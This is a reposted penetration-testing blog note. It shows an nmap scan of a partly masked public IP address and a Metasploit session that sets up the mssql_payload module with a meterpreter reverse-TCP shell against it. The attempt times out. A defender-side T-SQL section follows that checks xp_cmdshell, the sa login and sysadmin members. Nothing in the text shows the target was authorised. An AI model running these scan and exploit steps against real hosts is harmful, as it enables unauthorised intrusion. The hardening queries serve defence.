Pentest Notes - 2013-07-13: windows/mssql/mssql_payload

First, a scan:
Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 
NSE: Loaded 49 scripts for scanning. 
Initiating Ping Scan at 09:36 
Scanning 203.171.239.* [4 ports] 
Completed Ping Scan at 09:36, 0.90s elapsed (1 total hosts) 
Initiating Parallel DNS resolution of 1 host. at 09:36 
Completed Parallel DNS resolution of 1 host. at 09:36, 0.03s elapsed 
Initiating SYN Stealth Scan at 09:36 
Scanning 203.171.239.* [1000 ports] 
Discovered open port 3389/tcp on 203.171.239.* 
Discovered open port 80/tcp on 203.171.239.* 
Discovered open port 3306/tcp on 203.171.239.* 
Discovered open port 21/tcp on 203.171.239.* 
Completed SYN Stealth Scan at 09:36, 33.18s elapsed (1000 total ports) 
Initiating Service scan at 09:36 
Scanning 4 services on 203.171.239.* 
Completed Service scan at 09:37, 6.07s elapsed (4 services on 1 host) 
Initiating OS detection (try #1) against 203.171.239.* 
Retrying OS detection (try #2) against 203.171.239.* 
Initiating Traceroute at 09:37 
Completed Traceroute at 09:37, 0.06s elapsed 
Initiating Parallel DNS resolution of 1 host. at 09:37 
Completed Parallel DNS resolution of 1 host. at 09:37, 0.03s elapsed 
NSE: Script scanning 203.171.239.*. 
NSE: Starting runlevel 1 (of 1) scan. 
Initiating NSE at 09:37 
Completed NSE at 09:37, 5.22s elapsed 
NSE: Script Scanning completed. 
Nmap scan report for 203.171.239.* 
Host is up (0.043s latency). 
Not shown: 994 filtered ports 
PORT STATE SERVICE VERSION 
21/tcp open ftp Microsoft ftpd 
25/tcp closed smtp 
80/tcp open http Microsoft IIS httpd 
|_http-methods: No Allow or Public header in OPTIONS response (status code 400) 
|_html-title: Site doesn't have a title (text/html). 
110/tcp closed pop3 
3306/tcp open mysql MySQL 5.1.32-community 
| mysql-info: Protocol: 10 
| Version: 5.1.32-community 
| Thread ID: 30457 
| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection 
| Status: Autocommit 
|_Salt: B@Y";By^J5k<*[k+0O~O
3389/tcp open microsoft-rdp Microsoft Terminal Service 
Device type: general purpose|media device 
Running (JUST GUESSING) : Microsoft Windows 2003|XP (93%), Motorola Windows PocketPC/CE (85%) 
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Windows XP SP3 (85%), Motorola VIP1216 digital set top box (Windows CE 5.0) (85%) 
No exact OS matches for host (test conditions non-ideal). 
Network Distance: 1 hop 
TCP Sequence Prediction: Difficulty=262 (Good luck!) 
IP ID Sequence Generation: Busy server or unknown class 
Service Info: OS: Windows 
TRACEROUTE (using port 25/tcp) 
HOP RTT ADDRESS 
1 50.00 ms 203.171.239.* 
Read data files from: D:\metasploit\Nmap 
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 54.32 seconds 
Raw packets sent: 2095 (95.768KB) | Rcvd: 251 (223.649KB) 
Now to go after the box:
Welcome to the Metasploit Web Console! 
_ _ 
_ | | (_)_ 
____ ____| |_ ____ ___ ____ | | ___ _| |_ 
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _) 
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ 
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___) 
|_| 
=[ metasploit v3.4.2-dev [core:3.4 api:1.0] 
+ -- --=[ 566 exploits - 283 auxiliary 
+ -- --=[ 210 payloads - 27 encoders - 8 nops 
=[ svn r9834 updated 296 days ago (2010.07.14) 
Warning: This copy of the Metasploit Framework was last updated 296 days ago. 
We recommend that you update the framework at least every other day. 
For information on updating your copy of Metasploit, please see: 
http://www.metasploit.com/redmine/projects/framework/wiki/Updating 
>> use windows/mssql/mssql_payload 
>> info windows/mssql/mssql_payload 
Name: Microsoft SQL Server Payload Execution 
Version: 9669 
Platform: Windows 
Privileged: No 
License: Metasploit Framework License (BSD) 
Rank: Excellent 
Provided by: 
David Kennedy "ReL1K" <kennedyd013@gmail.com> 
jduck <jduck@metasploit.com> 
Available targets: 
Id Name 
-- ---- 
0 Automatic 
Basic options: 
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
PASSWORD                       no        The password for the specified username
RHOST                          yes       The target address
RPORT         1433             yes       The target port
USERNAME      sa               no        The username to authenticate as
UseCmdStager  true             no        Wait for user input before returning from exploit
VERBOSE       false            no        Enable verbose output
Payload information: 
Description: 
This module will execute an arbitrary payload on a Microsoft SQL 
Server, using the Windows debug.com method for writing an executable 
to disk and the xp_cmdshell stored procedure. File size restrictions 
are avoided by incorporating the debug bypass method presented at 
Defcon 17 by SecureState. Note that this module will leave a 
metasploit payload in the Windows System32 directory which must be 
manually deleted once the attack is completed. 
References: 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402 
http://www.osvdb.org/557 
http://www.securityfocus.com/bid/1281 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209 
http://www.osvdb.org/15757 
http://www.securityfocus.com/bid/4797 
http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf 
>> use windows/mssql/mssql_payload 
>> set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp 
>> show options 
Module options: 
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
PASSWORD                       no        The password for the specified username
RHOST                          yes       The target address
RPORT         1433             yes       The target port
USERNAME      sa               no        The username to authenticate as
UseCmdStager  true             no        Wait for user input before returning from exploit
VERBOSE       false            no        Enable verbose output
Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port
Exploit target: 
Id Name 
-- ---- 
0 Automatic 
>> set RHOST 203.171.239.* 
RHOST => 203.171.239.* 
>> set LHOST 172.16.2.101 
LHOST => 172.16.2.101 
>> exploit 
[*] Started reverse handler on 172.16.2.101:4444 
[-] Exploit failed: The connection timed out (203.171.239.*:1433). 
[*] Exploit completed, but no session was created.
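The attempt above timed out on 1433, a port the scan never listed as open. Had the port been reachable, the module's defaults (USERNAME sa, empty PASSWORD, then xp_cmdshell) spell out exactly what an administrator should verify on their own instance. The following T-SQL is an added, defender-side check, not part of the original post or of the Metasploit module; it assumes a sysadmin connection to the SQL Server instance and uses only standard catalog views and built-ins (sys.configurations, sys.sql_logins, sys.server_principals, sys.server_role_members, PWDCOMPARE, sp_configure). The read-only queries report state; the remediation statements at the end are commented out so nothing changes until you choose to run them.

```sql
-- Added example (not from the original post): check the preconditions the
-- mssql_payload module relies on, as shown in its options above, from the
-- server's side. Assumes a sysadmin connection; sections 1-3 only read state.

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means any sysadmin login can
--    spawn a Windows shell, which is the path the module takes after it
--    authenticates.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 2. State of the built-in 'sa' login. The module defaults to USERNAME sa with
--    an empty PASSWORD; PWDCOMPARE('', password_hash) returns 1 exactly when
--    the stored hash matches an empty password.
SELECT name,
       is_disabled,
       is_policy_checked,
       PWDCOMPARE('', password_hash) AS has_empty_password
FROM sys.sql_logins
WHERE name = 'sa';

-- 3. Every sysadmin login can re-enable xp_cmdshell through sp_configure, so
--    the setting in (1) is only as strong as this list.
SELECT sp.name AS login_name, sp.type_desc, sp.is_disabled
FROM sys.server_principals AS sp
JOIN sys.server_role_members AS rm ON rm.member_principal_id = sp.principal_id
JOIN sys.server_principals AS r  ON r.principal_id = rm.role_principal_id
WHERE r.name = 'sysadmin'
ORDER BY sp.name;

-- 4. Remediation (deliberately commented out): turn xp_cmdshell off, hide the
--    advanced options again, and disable the sa login so the default
--    credentials the module tries first stop working.
-- EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- EXEC sp_configure 'xp_cmdshell', 0;           RECONFIGURE;
-- EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
-- ALTER LOGIN sa DISABLE;
```

Run sections 1 to 3 on any instance that is reachable on 1433 from an untrusted network; a row with value_in_use = 1 in the first result, or has_empty_password = 1 in the second, is the combination the module's description depends on. Disabling xp_cmdshell alone is not sufficient, because each login in the third result can switch it back on, which is why the remediation also disables sa and why membership in sysadmin deserves the same review.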

Reposted from: https://www.cnblogs.com/hackwang/p/6228732.html